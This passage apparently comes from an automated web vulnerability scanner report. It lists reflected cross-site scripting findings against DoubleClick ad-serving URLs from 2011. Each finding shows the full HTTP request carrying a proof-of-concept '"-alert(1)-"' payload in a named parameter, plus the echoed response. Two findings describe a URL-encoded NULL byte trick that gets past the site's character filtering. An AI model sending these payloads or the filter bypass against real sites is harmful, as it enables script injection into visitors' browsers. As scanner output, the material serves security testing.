GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
"http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9279"-alert(1)-"f18c6157333 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:27:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6481

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
18k.jpg";
var minV = 8;
var FWH = ' width="300" height="60" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/q%3B232242619%3B3-0%3B0%3B56133728%3B91-300/60%3B39947595/39965382/1%3B
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46184"-alert(1)-"1f112e5f159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3a9f/f/6c/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cde"-alert(1)-"304992cdd17 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4916

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
k.net/click%3Bh%3Dv8/3a9f/7/69/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1fc"-alert(1)-"ab9deb67cba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/
...[SNIP]...

5.13. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3498"-alert(1)-"1afacfcce21 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6697

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs
...[SNIP]...

5.14. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff0e2"-alert(1)-"cb65f1ae9c0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6510

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.
...[SNIP]...

5.15. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59795"-alert(1)-"7c45a99b0fe was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:27:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.16. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %002096d"-alert(1)-"97b0dfdbd42 was submitted in the PG parameter. This input was echoed as 2096d"-alert(1)-"97b0dfdbd42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6709
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:42 GMT
Expires: Sun, 30 Jan 2011 14:50:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
r FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.17. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d012"-alert(1)-"798e5f4187f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
50.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=374868852d012"-alert(1)-"798e5f4187f&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/
...[SNIP]...

5.18. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2871"-alert(1)-"dd540de812e was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=Gc2871"-alert(1)-"dd540de812e&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B
...[SNIP]...

5.19. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0029a66"-alert(1)-"0503257d38a was submitted in the destination parameter. This input was echoed as 29a66"-alert(1)-"0503257d38a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6690
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:28:15 GMT
Expires: Sun, 30 Jan 2011 19:28:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
cape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=%0029a66"-alert(1)-"0503257d38ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/df/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01ea"-alert(1)-"f73a2c9f20 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

